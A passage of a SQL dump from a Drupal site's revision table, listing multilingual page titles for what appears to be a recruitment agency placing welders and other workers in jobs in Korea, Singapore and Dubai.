(26, 177, 'ja', 1, 2, 'Future Goal', 1688384504, 1689650519, 0, 0, 0, 1, 'en', 0),
(26, 177, 'ko', 1, 2, 'Future Goal', 1688384529, 1689391844, 0, 0, 0, NULL, 'en', 0),
(25, 178, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, NULL, 'und', 0),
(25, 178, 'ja', 1, 2, 'Vision & Mission ', 1688384401, 1689650477, 0, 0, 0, NULL, 'en', 0),
(25, 178, 'ko', 1, 2, 'Vision & Mission ', 1688384459, 1689650801, 0, 0, 0, 1, 'en', 0),
(26, 179, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 179, 'ja', 1, 2, 'Future Goal', 1688384504, 1689650519, 0, 0, 0, NULL, 'en', 0),
(26, 179, 'ko', 1, 2, 'Future Goal', 1688384529, 1689650824, 0, 0, 0, 1, 'en', 0),
(1, 180, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 180, 'ja', 1, 2, 'About Us', 1688382532, 1689650948, 0, 0, 0, 1, 'en', 0),
(1, 180, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(1, 181, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 181, 'ja', 1, 2, 'About Us', 1688382532, 1689651180, 0, 0, 0, 1, 'en', 0),
(1, 181, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(1, 182, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 182, 'ja', 1, 2, 'About Us', 1688382532, 1689651180, 0, 0, 0, NULL, 'en', 0),
(1, 182, 'ko', 1, 2, 'About Us', 1688382695, 1689652632, 0, 0, 0, 1, 'en', 0),
(24, 183, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 183, 'ja', 1, 2, 'Our Services', 1688384311, 1689659557, 0, 0, 0, 1, 'en', 0),
(24, 183, 'ko', 1, 2, 'Our Services', 1688432702, 1689391666, 0, 0, 0, NULL, 'en', 0),
(24, 184, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 184, 'ja', 1, 2, 'Our Services', 1688384311, 1689659611, 0, 0, 0, 1, 'en', 0),
(24, 184, 'ko', 1, 2, 'Our Services', 1688432702, 1689391666, 0, 0, 0, NULL, 'en', 0),
(20, 185, 'en', 1, 1, 'Memorial Photo of 2nd Batch Welding Students', 1688204366, 1688377233, 0, 0, 1, NULL, 'und', 0),
(20, 185, 'ja', 1, 2, '第2回生　研修生達と記念 ', 1688388745, 1689840443, 0, 0, 0, 1, 'en', 0),
(20, 185, 'ko', 1, 2, 'Memorial Photo of 2nd Batch Welding Students', 1688388761, 1688388764, 0, 0, 0, NULL, 'en', 0),
(19, 186, 'en', 1, 1, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688200678, 1688377651, 0, 0, 1, NULL, 'und', 0),
(19, 186, 'ja', 1, 2, '第1バッチから60人以上の方が、溶接技術者のE 7-3ビザポジションで韓国に行くためのKOSHIPAスキルテストの受験登録に来られました。', 1688388770, 1689841260, 0, 0, 0, 1, 'en', 0),
(19, 186, 'ko', 1, 2, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688388781, 1688388791, 0, 0, 0, NULL, 'en', 0),
(9, 187, 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1687241497, 1688546162, 0, 0, 1, NULL, 'und', 0),
(9, 187, 'ja', 1, 2, 'ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。', 1688388729, 1689841547, 0, 0, 0, 1, 'en', 0),
(9, 187, 'ko', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388738, 1688388741, 0, 0, 0, NULL, 'en', 0),
(17, 188, 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1688194656, 1688546090, 0, 0, 1, NULL, 'und', 0),
(17, 188, 'ja', 1, 2, 'ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。', 1688388699, 1689841671, 0, 0, 0, 1, 'en', 0),
(17, 188, 'ko', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388710, 1688388714, 0, 0, 0, NULL, 'en', 0),
(23, 189, 'en', 1, 2, 'Company Profile', 1688384143, 1689854470, 0, 0, 1, 1, 'und', 0),
(23, 189, 'ja', 1, 2, '会社情報', 1688384224, 1689414307, 0, 0, 0, NULL, 'en', 0),
(23, 189, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 190, 'en', 1, 2, 'Company Profile', 1688384143, 1689854542, 0, 0, 1, 1, 'und', 0),
(23, 190, 'ja', 1, 2, '会社情報', 1688384224, 1689414307, 0, 0, 0, NULL, 'en', 0),
(23, 190, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 191, 'en', 1, 2, 'Company Profile', 1688384143, 1689856127, 0, 0, 1, 1, 'und', 0),
(23, 191, 'ja', 1, 2, '会社情報', 1688384224, 1689414307, 0, 0, 0, NULL, 'en', 0),
(23, 191, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 192, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, 1, 'und', 0),
(23, 192, 'ja', 1, 2, '会社情報', 1688384224, 1689414307, 0, 0, 0, NULL, 'en', 0),
(23, 192, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 193, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, NULL, 'und', 0),
(23, 193, 'ja', 1, 2, '会社情報', 1688384224, 1689856323, 0, 0, 0, 1, 'en', 0),
(23, 193, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 194, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, NULL, 'und', 0),
(23, 194, 'ja', 1, 2, '会社情報', 1688384224, 1689856323, 0, 0, 0, NULL, 'en', 0),
(23, 194, 'ko', 1, 2, 'Company Profile', 1688384243, 1689856356, 0, 0, 0, 1, 'en', 0),
(24, 195, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 195, 'ja', 1, 2, '事業内容', 1688384311, 1689911684, 0, 0, 0, 1, 'en', 0),
(24, 195, 'ko', 1, 2, 'Our Services', 1688432702, 1689391666, 0, 0, 0, NULL, 'en', 0),
(25, 196, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, NULL, 'und', 0),
(25, 196, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1689911746, 0, 0, 0, 1, 'en', 0),
(25, 196, 'ko', 1, 2, 'Vision & Mission ', 1688384459, 1689650801, 0, 0, 0, NULL, 'en', 0),
(26, 197, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 197, 'ja', 1, 2, '会社の目標', 1688384504, 1689911802, 0, 0, 0, 1, 'en', 0),
(26, 197, 'ko', 1, 2, 'Future Goal', 1688384529, 1689650824, 0, 0, 0, NULL, 'en', 0),
(26, 198, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 198, 'ja', 1, 2, '目標', 1688384504, 1689911813, 0, 0, 0, 1, 'en', 0),
(26, 198, 'ko', 1, 2, 'Future Goal', 1688384529, 1689650824, 0, 0, 0, NULL, 'en', 0),
(27, 199, 'en', 1, 2, 'Company History', 1688384566, 1689650226, 0, 0, 1, NULL, 'und', 0),
(27, 199, 'ja', 1, 2, '会社沿革', 1688384583, 1689912074, 0, 0, 0, 1, 'en', 0),
(27, 199, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(23, 200, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, NULL, 'und', 0),
(23, 200, 'ja', 1, 2, '会社情報', 1688384224, 1689856323, 0, 0, 0, NULL, 'en', 0),
(23, 200, 'ko', 1, 2, '회사 설립', 1688384243, 1689912307, 0, 0, 0, 1, 'en', 0);
INSERT INTO `node_field_revision` (`nid`, `vid`, `langcode`, `status`, `uid`, `title`, `created`, `changed`, `promote`, `sticky`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`) VALUES
(24, 201, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 201, 'ja', 1, 2, '事業内容', 1688384311, 1689911684, 0, 0, 0, NULL, 'en', 0),
(24, 201, 'ko', 1, 2, '회사 서비스', 1688432702, 1689912364, 0, 0, 0, 1, 'en', 0),
(25, 202, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, NULL, 'und', 0),
(25, 202, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1689911746, 0, 0, 0, NULL, 'en', 0),
(25, 202, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, 1, 'en', 0),
(26, 203, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 203, 'ja', 1, 2, '目標', 1688384504, 1689911813, 0, 0, 0, NULL, 'en', 0),
(26, 203, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1689912432, 0, 0, 0, 1, 'en', 0),
(4, 204, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, NULL, 'und', 0),
(4, 204, 'ja', 1, 2, 'Wanted Desperately', 1688388939, 1688388945, 0, 0, 0, NULL, 'en', 0),
(4, 204, 'ko', 1, 2, 'Contact us for more information.', 1688388956, 1689913907, 0, 0, 0, 1, 'en', 0),
(1, 205, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 205, 'ja', 1, 2, '弊社ウェブサイト', 1688382532, 1689915842, 0, 0, 0, 1, 'en', 0),
(1, 205, 'ko', 1, 2, 'About Us', 1688382695, 1689652632, 0, 0, 0, NULL, 'en', 0),
(1, 206, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 206, 'ja', 1, 2, '弊社ウェブサイト', 1688382532, 1689915940, 0, 0, 0, NULL, 'en', 0),
(1, 206, 'ko', 1, 2, 'About Us', 1688382695, 1689652632, 0, 0, 0, NULL, 'en', 0),
(18, 207, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 207, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1689925879, 0, 0, 0, 1, 'en', 0),
(18, 207, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(4, 208, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, NULL, 'und', 0),
(4, 208, 'ja', 0, 2, 'Wanted Desperately', 1688388939, 1689927237, 0, 0, 0, 1, 'en', 0),
(4, 208, 'ko', 1, 2, 'Contact us for more information.', 1688388956, 1689913907, 0, 0, 0, NULL, 'en', 0),
(4, 209, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, NULL, 'und', 0),
(4, 209, 'ja', 0, 2, 'Wanted Desperately', 1688388939, 1689927237, 0, 0, 0, NULL, 'en', 0),
(4, 209, 'ko', 0, 2, 'Contact us for more information.', 1688388956, 1689927282, 0, 0, 0, 1, 'en', 0),
(4, 210, 'en', 0, 1, 'Wanted Desperately', 1687238298, 1689927311, 0, 0, 1, 1, 'und', 0),
(4, 210, 'ja', 0, 2, 'Wanted Desperately', 1688388939, 1689927237, 0, 0, 0, NULL, 'en', 0),
(4, 210, 'ko', 0, 2, 'Contact us for more information.', 1688388956, 1689927282, 0, 0, 0, NULL, 'en', 0),
(10, 211, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 211, 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1689928131, 0, 0, 0, 1, 'en', 0),
(10, 211, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(5, 212, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 212, 'ja', 1, 2, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。', 1688388941, 1689928736, 0, 0, 0, 1, 'en', 0),
(5, 212, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(3, 213, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376827, 0, 0, 1, NULL, 'und', 0),
(3, 213, 'ja', 1, 2, 'E 7-3 溶接クラスには誰が参加すべきですか?', 1688388943, 1689929077, 0, 0, 0, 1, 'en', 0),
(3, 213, 'ko', 1, 2, 'Who should attend E 7-3 Welding Class?', 1688388959, 1688388967, 0, 0, 0, NULL, 'en', 0),
(6, 214, 'en', 1, 1, 'In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.', 1687240083, 1688546491, 0, 0, 1, NULL, 'und', 0),
(6, 214, 'ja', 1, 2, 'E7-3ビザを持って韓国の造船所で雇用されるためには、研修生に対して迅速に来て溶接試験を受けるために必要な内容が説明されます。', 1688388644, 1689929221, 0, 0, 0, 1, 'en', 0),
(6, 214, 'ko', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388653, 1688388655, 0, 0, 0, NULL, 'en', 0),
(8, 215, 'en', 1, 1, 'Wanted people who want to work as a Welder (expert welding technician) in Korea Shipyard.', 1687240986, 1688546702, 0, 0, 1, NULL, 'und', 0),
(8, 215, 'ja', 1, 2, '韓国の造船所で溶接技術者として働きたい人を募集しています。（経験豊富な溶接技術者）', 1688388288, 1689929372, 0, 0, 0, 1, 'en', 0),
(8, 215, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388422, 0, 0, 0, NULL, 'en', 0),
(7, 216, 'en', 1, 1, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1687240759, 1688547023, 0, 0, 1, NULL, 'und', 0),
(7, 216, 'ja', 1, 2, 'E-7ビザは外国人に対する特定能力を持つ方のための特別なビザです。', 1688388674, 1689929528, 0, 0, 0, 1, 'en', 0),
(7, 216, 'ko', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388683, 1688388689, 0, 0, 0, NULL, 'en', 0),
(28, 217, 'en', 1, 1, 'HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.', 1689933496, 1689933728, 0, 0, 1, 1, 'und', 0),
(28, 218, 'en', 1, 1, 'HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.', 1689933496, 1689933768, 0, 0, 1, 1, 'und', 0),
(28, 219, 'en', 1, 1, 'HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.', 1689933496, 1689933768, 0, 0, 1, NULL, 'und', 0),
(28, 219, 'ja', 1, 1, 'HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。', 1689933782, 1689933982, 0, 0, 0, 1, 'en', 0),
(28, 220, 'en', 1, 1, 'HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.', 1689933496, 1689933768, 0, 0, 1, NULL, 'und', 0),
(28, 220, 'ja', 1, 1, 'HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。', 1689933782, 1689933982, 0, 0, 0, NULL, 'en', 0),
(28, 220, 'ko', 1, 1, 'HIT LANGUAGE CENTER」는 NEW COMET TRADING AGENCY와의 협력으로 한국어 코스와 일본어 코스를 개설했습니다. 관심있는 분들은 빠르게 등록해주세요.', 1689933989, 1689934025, 0, 0, 0, 1, 'en', 0),
(29, 221, 'en', 1, 1, 'The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER.', 1689934044, 1689934449, 0, 0, 1, 1, 'und', 0),
(29, 222, 'en', 1, 1, 'The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER.', 1689934044, 1689934449, 0, 0, 1, NULL, 'und', 0),
(29, 222, 'ja', 1, 1, 'NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。', 1689934455, 1689934512, 0, 0, 0, 1, 'en', 0),
(29, 223, 'en', 1, 1, 'The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER.', 1689934044, 1689934449, 0, 0, 1, NULL, 'und', 0),
(29, 223, 'ja', 1, 1, 'NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。', 1689934455, 1689934512, 0, 0, 0, NULL, 'en', 0),
(29, 223, 'ko', 1, 1, 'NEW COMET TRADING AGENCY의 한국 측 담당자인 홍씨가 HIT LANGUAGE CENTER에서 KOSHIPA TEST 평가 결과를 받을 수 있는 시기에 대해 설명했습니다.', 1689934518, 1689934558, 0, 0, 0, 1, 'en', 0),
(30, 224, 'en', 1, 1, 'We urgently need the following skilled workers to work in Singapore', 1689935306, 1689935390, 0, 0, 1, 1, 'und', 0),
(30, 225, 'en', 1, 1, 'We urgently need the following skilled workers to work in Singapore', 1689935306, 1689935390, 0, 0, 1, NULL, 'und', 0),
(30, 225, 'ja', 1, 1, '以下の熟練労働者をシンガポールで緊急に求めています。', 1689935395, 1689935437, 0, 0, 0, 1, 'en', 0),
(30, 226, 'en', 1, 1, 'We urgently need the following skilled workers to work in Singapore', 1689935306, 1689935390, 0, 0, 1, NULL, 'und', 0),
(30, 226, 'ja', 1, 1, '以下の熟練労働者をシンガポールで緊急に求めています。', 1689935395, 1689935437, 0, 0, 0, NULL, 'en', 0),
(30, 226, 'ko', 1, 1, '긴급하게 다음과 같은 숙련 노동자들이 싱가포르에서 일할 필요가 있습니다.', 1689935482, 1689935517, 0, 0, 0, 1, 'en', 0),
(27, 227, 'en', 1, 2, 'Company History', 1688384566, 1689650226, 0, 0, 1, NULL, 'und', 0),
(27, 227, 'ja', 1, 2, '会社沿革', 1688384583, 1690084031, 0, 0, 0, 1, 'en', 0),
(27, 227, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(23, 228, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, NULL, 'und', 0),
(23, 228, 'ja', 1, 2, '会社情報', 1688384224, 1690084525, 0, 0, 0, 1, 'en', 0),
(23, 228, 'ko', 1, 2, '회사 설립', 1688384243, 1689912307, 0, 0, 0, NULL, 'en', 0),
(26, 229, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 229, 'ja', 1, 2, '会社の目標', 1688384504, 1690084805, 0, 0, 0, 1, 'en', 0),
(26, 229, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1689912432, 0, 0, 0, NULL, 'en', 0),
(25, 230, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, NULL, 'und', 0),
(25, 230, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690084883, 0, 0, 0, 1, 'en', 0),
(25, 230, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, NULL, 'en', 0),
(24, 231, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 231, 'ja', 1, 2, '事業内容', 1688384311, 1690085236, 0, 0, 0, 1, 'en', 0),
(24, 231, 'ko', 1, 2, '회사 서비스', 1688432702, 1689912364, 0, 0, 0, NULL, 'en', 0),
(11, 232, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 232, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690085713, 0, 0, 0, 1, 'en', 0),
(11, 232, 'ko', 1, 2, 'Contact Us', 1688383142, 1688383148, 0, 0, 0, NULL, 'en', 0),
(26, 233, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 233, 'ja', 1, 2, '会社の目標', 1688384504, 1690084805, 0, 0, 0, NULL, 'en', 0),
(26, 233, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1690087634, 0, 0, 0, 1, 'en', 0),
(11, 234, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 234, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690085713, 0, 0, 0, NULL, 'en', 0),
(11, 234, 'ko', 1, 2, 'Contact Us', 1688383142, 1690088051, 0, 0, 0, 1, 'en', 0),
(11, 235, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 235, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690085713, 0, 0, 0, NULL, 'en', 0),
(11, 235, 'ko', 1, 2, 'Contact Us', 1688383142, 1690088294, 0, 0, 0, 1, 'en', 0),
(25, 236, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258215, 0, 0, 1, 1, 'und', 0),
(25, 236, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690084883, 0, 0, 0, NULL, 'en', 0),
(25, 236, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, NULL, 'en', 0),
(25, 237, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258215, 0, 0, 1, NULL, 'und', 0),
(25, 237, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258270, 0, 0, 0, 1, 'en', 0),
(25, 237, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, NULL, 'en', 0),
(25, 238, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258215, 0, 0, 1, NULL, 'und', 0),
(25, 238, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258345, 0, 0, 0, 1, 'en', 0),
(25, 238, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, NULL, 'en', 0),
(25, 239, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258379, 0, 0, 1, 1, 'und', 0),
(25, 239, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258345, 0, 0, 0, NULL, 'en', 0),
(25, 239, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1689912400, 0, 0, 0, NULL, 'en', 0),
(25, 240, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258379, 0, 0, 1, NULL, 'und', 0),
(25, 240, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258345, 0, 0, 0, NULL, 'en', 0),
(25, 240, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690258505, 0, 0, 0, 1, 'en', 0),
(27, 241, 'en', 1, 2, 'Company History', 1688384566, 1690282556, 0, 0, 1, 1, 'und', 0),
(27, 241, 'ja', 1, 2, '会社沿革', 1688384583, 1690084031, 0, 0, 0, NULL, 'en', 0),
(27, 241, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(27, 242, 'en', 1, 2, 'Company History', 1688384566, 1690282556, 0, 0, 1, NULL, 'und', 0),
(27, 242, 'ja', 1, 2, '会社沿革', 1688384583, 1690282611, 0, 0, 0, 1, 'en', 0),
(27, 242, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(27, 243, 'en', 1, 2, 'Company History', 1688384566, 1690282556, 0, 0, 1, NULL, 'und', 0),
(27, 243, 'ja', 1, 2, '会社沿革', 1688384583, 1690282611, 0, 0, 0, NULL, 'en', 0),
(27, 243, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, 1, 'en', 0),
(11, 244, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 244, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690085713, 0, 0, 0, NULL, 'en', 0),
(11, 244, 'ko', 1, 2, '연락처', 1688383142, 1690339928, 0, 0, 0, 1, 'en', 0),
(11, 245, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 245, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690339970, 0, 0, 0, 1, 'en', 0),
(11, 245, 'ko', 1, 2, '연락처', 1688383142, 1690339928, 0, 0, 0, NULL, 'en', 0),
(11, 246, 'en', 1, 1, 'Contact Us', 1687305757, 1690339985, 0, 0, 1, 1, 'und', 0),
(11, 246, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690339970, 0, 0, 0, NULL, 'en', 0),
(11, 246, 'ko', 1, 2, '연락처', 1688383142, 1690339928, 0, 0, 0, NULL, 'en', 0),
(11, 247, 'en', 1, 1, 'Contact Us', 1687305757, 1690339985, 0, 0, 1, NULL, 'und', 0),
(11, 247, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690339970, 0, 0, 0, NULL, 'en', 0),
(11, 247, 'ko', 1, 2, '연락처', 1688383142, 1690340000, 0, 0, 0, 1, 'en', 0),
(23, 248, 'en', 1, 2, 'Company Profile', 1688384143, 1689856229, 0, 0, 1, NULL, 'und', 0),
(23, 248, 'ja', 1, 2, '会社情報', 1688384224, 1690084525, 0, 0, 0, NULL, 'en', 0),
(23, 248, 'ko', 1, 2, '회사 설립', 1688384243, 1690340246, 0, 0, 0, 1, 'en', 0),
(24, 249, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 249, 'ja', 1, 2, '事業内容', 1688384311, 1690085236, 0, 0, 0, NULL, 'en', 0),
(24, 249, 'ko', 1, 2, '회사 서비스', 1688432702, 1690341799, 0, 0, 0, 1, 'en', 0),
(25, 250, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690258379, 0, 0, 1, NULL, 'und', 0),
